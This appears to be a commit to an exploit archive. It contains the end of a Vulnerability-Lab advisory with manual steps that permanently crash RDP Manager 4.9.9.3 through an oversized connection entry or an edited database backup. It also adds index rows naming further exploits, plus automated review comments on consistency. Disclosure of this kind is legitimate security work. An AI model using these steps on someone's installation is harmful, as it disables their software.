===============
Low
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the official RDP Manager v4.9.9.3 windows software client.
The denial of service attack allows an attacker to freeze, block or crash a local process, service or component to compromise.
The local vulnerability is located in the Verbindungsname and Server input fields of the Verbindung (Neu/Bearbeiten).
The Verbindungsname and Server inputs are not limited by the size of characters. Thus allows a local privileged attacker
to add a malformed server entry with a large size that crashs (multiple application errors) the application permanently.
The entry can be modified as zip backup for imports as sqLitedatabase.db3 to make the software unusable until a full
reinstall with separate deletes is performed to recover.
Successful exploitation of the denial of service vulnerability results in permanent unhandled software and application crashs.
Vulnerable Input(s):
[+] Verbindungsname
[+] Server
Affected Module(s):
[+] Wiederherstellen (sqLitedatabase.db3)
Proof of Concept (PoC):
=======================
The local denial of service vulnerability can be exploited by attackers with system access privileges without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce ...
1. Install the RDP-Manager.exe software for windows
2. Start the software and add a new entry in the main tab
3. Include a large amount of characters max 1024 and save the entry
4. The software freezes and crashs with multiple errors in the actual session and after restart it crash permanently as well
Note: Alternativly you can export a database with regular valid entry and modify it via backup for a import
5. Successful reproduce of the local denial of service vulnerability!
Credits & Authors:
==================
N/A - Anonymous [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=N%2FA+-+Anonymous
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ; https://www.vulnerability-db.com
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
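Review bot: the header line `# Tested on: Linux` contradicts the rest of the file, which calls the product a "windows software client" in the title, abstract and technical details and whose first reproduction step is "Install the RDP-Manager.exe software for windows"; change it to Windows. The technical details also state that the Verbindungsname and Server inputs are "not limited by the size of characters", while step 3 says "Include a large amount of characters max 1024"; say clearly whether 1024 is the length that triggers the crash or the largest value the field accepts. Minor: "Servie" in the document title and "crashs"/"Alternativly" in the body are typos.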


@ -11410,6 +11410,7 @@ id,file,description,date,author,type,platform,port
50470,exploits/windows/local/50470.py,"Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
50471,exploits/windows/local/50471.py,"YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
50472,exploits/windows/local/50472.py,"10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)",1970-01-01,ro0k,local,windows,
50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
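Review bot: the new row `50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows,` sets the platform to windows, which matches the advisory body but not the advisory header `# Tested on: Linux` added in the same commit; fix the header so the index and the file agree. The row is placed in id order after 50472 and the hunk header's line count (6 to 7) matches the single addition.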
@ -44575,3 +44576,19 @@ id,file,description,date,author,type,platform,port
50469,exploits/multiple/webapps/50469.rb,"Ericsson Network Location MPS GMPC21 - Privilege Escalation (Metasploit)",1970-01-01,AkkuS,webapps,multiple,
50473,exploits/multiple/webapps/50473.txt,"i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw",1970-01-01,LiquidWorm,webapps,multiple,
50474,exploits/multiple/webapps/50474.txt,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)",1970-01-01,P4p4_M4n3,webapps,multiple,
50475,exploits/php/webapps/50475.txt,"PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50476,exploits/php/webapps/50476.txt,"WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50477,exploits/php/webapps/50477.py,"Fuel CMS 1.4.1 - Remote Code Execution (3)",1970-01-01,"Padsala Trushal",webapps,php,
50478,exploits/java/webapps/50478.txt,"Eclipse Jetty 11.0.5 - Sensitive File Disclosure",1970-01-01,"Mayank Deshmukh",webapps,java,
50479,exploits/php/webapps/50479.txt,"WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Luca Schembri",webapps,php,
50480,exploits/java/webapps/50480.go,"OpenAM 13.0 - LDAP Injection",1970-01-01,"Charlton Trezevant",webapps,java,
50482,exploits/php/webapps/50482.txt,"Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50483,exploits/php/webapps/50483.txt,"Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection",1970-01-01,Vulnerability-Lab,webapps,php,
50485,exploits/hardware/webapps/50485.txt,"Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,hardware,
50486,exploits/php/webapps/50486.txt,"PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50487,exploits/php/webapps/50487.txt,"PHP Melody 3.0 - 'vid' SQL Injection",1970-01-01,Vulnerability-Lab,webapps,php,
50489,exploits/php/webapps/50489.txt,"Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection",1970-01-01,Vulnerability-Lab,webapps,php,
50488,exploits/php/webapps/50488.txt,"PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,multiple,
50491,exploits/php/webapps/50491.txt,"Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50492,exploits/php/webapps/50492.txt,"Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
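Review bot: rows 50489 and 50488 are added out of order (`50489,exploits/php/webapps/50489.txt,"Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection",...` precedes `50488,exploits/php/webapps/50488.txt,"PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)",...`) while every other new row in this hunk is in ascending id order; swap them. Id 50481 is skipped between 50480 and 50482, which is fine if that entry was withheld but is worth confirming. Also, the Isshue Shopping Cart title uses "Cross Site Scripting" where all other rows use "Cross-Site Scripting"; normalize it so searches on the description column match consistently.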
